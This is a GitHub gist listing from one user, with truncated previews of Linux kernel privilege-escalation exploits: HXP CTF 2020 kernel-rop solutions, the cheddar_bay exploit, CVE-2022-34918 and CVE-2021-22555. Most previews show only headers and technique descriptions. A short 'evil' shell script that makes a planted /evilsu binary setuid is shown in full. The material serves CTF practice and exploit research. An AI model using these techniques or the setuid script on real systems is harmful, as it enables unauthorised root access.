brant-ruan
/ exploit_bypass_kaslr_with_offset_leak.c
Last active
September 5, 2022 04:51
HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with modprobe; bypass KASLR with kernel offset leak; no FG-KASLR
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <signal.h> | |
| char *VULN_DRV = "/dev/hackme"; | |
| void spawn_shell(); |
brant-ruan
/ evil
Last active
September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_unaffected_gadgets] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with coredump; bypass KASLR with kernel offset leak; bypass FG-KASLR with unaffected gadgets
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| mv /evilsu /tmp/evilsu | |
| chmod u+s /tmp/evilsu | |
| chmod 777 /evilsu |
brant-ruan
/ exploit_bypass_fgkaslr_with_ksymtab_leak.c
Last active
September 5, 2022 04:51
[exploit_bypass_fgkaslr_with_ksymtab_leak] HXP CTF 2020 >> kernel-rop | bypass SMEP with kernel ROP; bypass KPTI with trampoline; bypass KASLR with kernel offset leak; bypass FG-KASLR with ksymtab leak
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <signal.h> | |
| void spawn_shell(); | |
| void leak_commit_creds_from_ksymtab(); | |
| void leak_prepare_kernel_cred_from_ksymtab(); |
brant-ruan
/ ubuntu9.10_karmic_apt_sources.list.txt
Last active
September 13, 2022 16:18
resources for ubuntu 9.10 karmic used for CVE-2009-1897 reproduction
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # deb cdrom:[Ubuntu-Server 9.10 _Karmic Koala_ - Release amd64 (20091027.2)]/ karmic main restricted | |
| #deb cdrom:[Ubuntu-Server 9.10 _Karmic Koala_ - Release amd64 (20091027.2)]/ karmic main restricted | |
| # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to | |
| # newer versions of the distribution. | |
| deb http://old-releases.ubuntu.com/ubuntu/ karmic main restricted | |
| deb-src http://old-releases.ubuntu.com/ubuntu/ karmic main restricted |
brant-ruan
/ exploit.c
Created
September 13, 2022 16:19
https://www.grsecurity.net/~spender/exploits/cheddar_bay/exploit.c, modified by Bonan to run on Ubuntu 9.10 with recompiled 2.6.31 kernel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* super fun 2.6.30+/RHEL5 2.6.18 local kernel exploit in /dev/net/tun | |
| A vulnerability which, when viewed at the source level, is unexploitable! | |
| But which, thanks to gcc optimizations, becomes exploitable :) | |
| Also, bypass of mmap_min_addr via SELinux vulnerability! | |
| (where having SELinux enabled actually increases your risk against a | |
| large class of kernel vulnerabilities) | |
| for 2.6.30 without SELinux enabled, compile with: | |
| cc -fPIC -fno-stack-protector -shared -o exploit.so exploit.c | |
| (on a 64bit system -m64 may be necessary to compile a 64bit .so) |
brant-ruan
/ exploit.c
Created
October 7, 2022 04:23
CVE-2022-34918, OOB -> leak kernel-base&physmap-base (with kmalloc-64 objects: user_key_payload, percpu_ref_data) -> write modprobe (unlink of simple_xattr list, with the help of physmap), https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2022-34918
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // $ gcc -no-pie -static -pthread ./exploit.c -o ./exploit | |
| #define _GNU_SOURCE | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #include <limits.h> | |
| #include <linux/keyctl.h> | |
| #include <sys/wait.h> |
brant-ruan
/ .config
Created
October 7, 2022 07:56
CVE-2022-34918 https://github.com/bsauce/kernel-exploit-factory/blob/main/CVE-2022-34918/config
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # Automatically generated file; DO NOT EDIT. | |
| # Linux/x86 5.17.15 Kernel Configuration | |
| # | |
| CONFIG_CC_VERSION_TEXT="gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0" | |
| CONFIG_CC_IS_GCC=y | |
| CONFIG_GCC_VERSION=90300 | |
| CONFIG_CLANG_VERSION=0 | |
| CONFIG_AS_IS_GNU=y | |
| CONFIG_AS_VERSION=23400 |
brant-ruan
/ exploit.c
Created
October 19, 2022 08:09
https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * CVE-2021-22555: Turning \x00\x00 into 10000$ | |
| * by Andy Nguyen (theflow@) | |
| * | |
| * theflow@theflow:~$ gcc -m32 -static -o exploit -Wall exploit.c | |
| * theflow@theflow:~$ ./exploit | |
| * [+] Linux Privilege Escalation by theflow@ - 2021 | |
| * | |
| * [+] STAGE 0: Initialization | |
| * [*] Setting up namespace sandbox... |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| char *VULN_DRV = "/dev/holstein"; | |
| void spawn_shell(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdint.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| char *VULN_DRV = "/dev/holstein"; | |
| void spawn_shell(); |